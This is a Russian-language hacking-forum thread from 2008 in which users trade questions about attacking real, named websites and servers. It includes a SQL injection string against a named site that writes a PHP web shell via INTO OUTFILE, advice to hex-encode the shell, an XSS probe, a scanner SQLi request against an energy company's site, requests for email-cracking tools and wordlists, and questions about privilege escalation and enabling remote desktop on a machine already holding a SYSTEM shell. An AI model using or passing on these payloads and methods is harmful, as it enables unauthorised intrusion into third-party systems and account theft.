Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    }{0tt@БЬ)Ч
    ну взял с того что я могу творить над сервером все что хочу...
     
  2. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    -=megahertz=-, напиши в консоли whoami;id и скинь результат
     
  3. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    server
    uid=1000(server) gid=1000(server) groups=1000(server)
     
  4. Karantin

    Karantin Elder - Старейшина

    Joined:
    21 Dec 2007
    Messages:
    330
    Likes Received:
    146
    Reputations:
    24
    это не всё что хочу, ты заблуждаешься.
    даже uid=0(root) gid=0(root) groups=0(root) может не дать тебе всех прав, бывает и такое.
     
  5. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    -=megahertz=-, напиши там же uname -a и скинь результат, или сам поищи на милворме или просто в гугле сплойт
     
  6. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    Linux vs-server 2.6.18-5-xen-686 #1 SMP Mon Dec 24 20:49:58 UTC 2007 i686 GNU/Linux
     
  7. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    Была найдена такая уязвимость: на одном варез сайте есть такой сервис, что если к адресу сайта подписать такое: site.ru/?site=ваш_сайт (без HTTP://), то на всех страницах сайта будет ссылка внизу страницы на ваш_сайт! Попробова ввести такой URL вида site.ru/fol/?list="><script>alert()</script> - выскакивает аларм )) попробовал ввести в URL php код - не прлучилось, вопросительные знаки режутся. Пробовал в разных кодировках - все бестолку. Но кроме знака вопроса больше ничего не режется! Вопрос собственно такой: как еще можно навредить сайту через эту уязвимость если сайт НЕ поддерживает куки? Там вообще даже нету регистрации юзеров.
     
  8. sasha008

    sasha008 Elder - Старейшина

    Joined:
    2 Apr 2008
    Messages:
    102
    Likes Received:
    49
    Reputations:
    -3
    Где можно раздобыть хорошую прогу для взлома емейла и плюс хороший словарь?
     
  9. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    Блин нифига понять немогу

    есть скуль такого вида
    danko.dn.ua/news.php?id=-17+union+select+1,'<?%20system($_GET[''cmd''])%20?>',3+from+mysql.user+into+outfile+''/usr/local/www/data/admin/fckeditor/_samples/php/gif.php/'

    пишет Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php

    ver-5.1.22-rc
    user-root@localhost

    http://danko.dn.ua/admin/fckeditor/_samples/php/
     
    #1829 neon_fx, 29 Apr 2008
    Last edited: 29 Apr 2008
  10. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    даже после нормальной заливки шелла может возвращаться ошибка, и еще лучше шелл закодировать в hex, и точно кавычки не экранируются?
    возможно нет прав/файл существует, вобщем по тем данным что ты дал, одназначно не скажешь
     
    #1830 Scipio, 29 Apr 2008
    Last edited: 29 Apr 2008
    1 person likes this.
  11. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    попробуй LOAD_FILE если не катит, попробуй в хекс закодировать путь до файла, если опять не катит, значит file_priv отключен, тогда забей, если все ок, то шелл в хекс и заливай.
     
  12. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    LOAD_FILE есть
    file_priv -ок
    и шелл кодировать пробовал

    буду пробовать залить в базу а потом из базы в файл
     
    #1832 neon_fx, 30 Apr 2008
    Last edited: 30 Apr 2008
  13. Kuzya

    Kuzya Elder - Старейшина

    Joined:
    27 Apr 2008
    Messages:
    166
    Likes Received:
    106
    Reputations:
    30
    Скажите плиз где можно почитать про SSI-уязвимости (Server Side Include)
     
  14. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Kuzya, _ttp://www.citforum.ru/internet/html/ssi.shtml и http://ru.wikipedia.org/wiki/SSI_(%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5)
     
  15. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    кто подскажет как это реализовать?

    Удаленный пользователь может представить специально обработанный авторизационный пакет, чтобы обойти механизм авторизации на MySQL сервере. Уязвимость расположена в check_scramble_323() функции.
     
  16. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    POST /index.php?id=211 HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
    Host: www.energia.ee
    Content-Length: 282
    Connection: Close
    Pragma: no-cache
    Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL)
    Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
    Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

    html_enabled=1&subject=Elektritarne%20pakkumine%20L%C3%A4tis%20v%C3%B5i%20Leedus&locationData=979%3Att_content%3A3514&Ettev%C3%B5te="+or+1%3D1+--+&[email protected]&[email protected]&[email protected]&formtype_mail=Saada

    Орёт,что скуля. Пробывал постами меняя параметры заставить отреагировать серв,но ему поф даже на 1+and+0=0 и 1+and+1=1

    Менял параметры, как только мог. Есть тут инжект или нету?
     
  17. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Что ты хотел этим сказать? 0_о
     
    1 person likes this.
  18. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25

    моя хотело сказать,что ему абсолютно ПОФ,тобишь он возвращает одинаковый результат,обрезает чели,потому что при смени ид меняется только страница )),а запросы он как будто ваще не видит: )
     
  19. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    по моему правильнее было так сделать =1+1 или =2-1 если страница та же то инжекта нет...
     
  20. Sh..)

    Sh..) Banned

    Joined:
    24 Apr 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    0
    при подключение через mstsc.exe пишет Эудалённые подключения запрещены"
    как запустить? есть шелл на удалённой системе к которой произвожу коннэкт.
    права system
     
Thread Status:
Not open for further replies.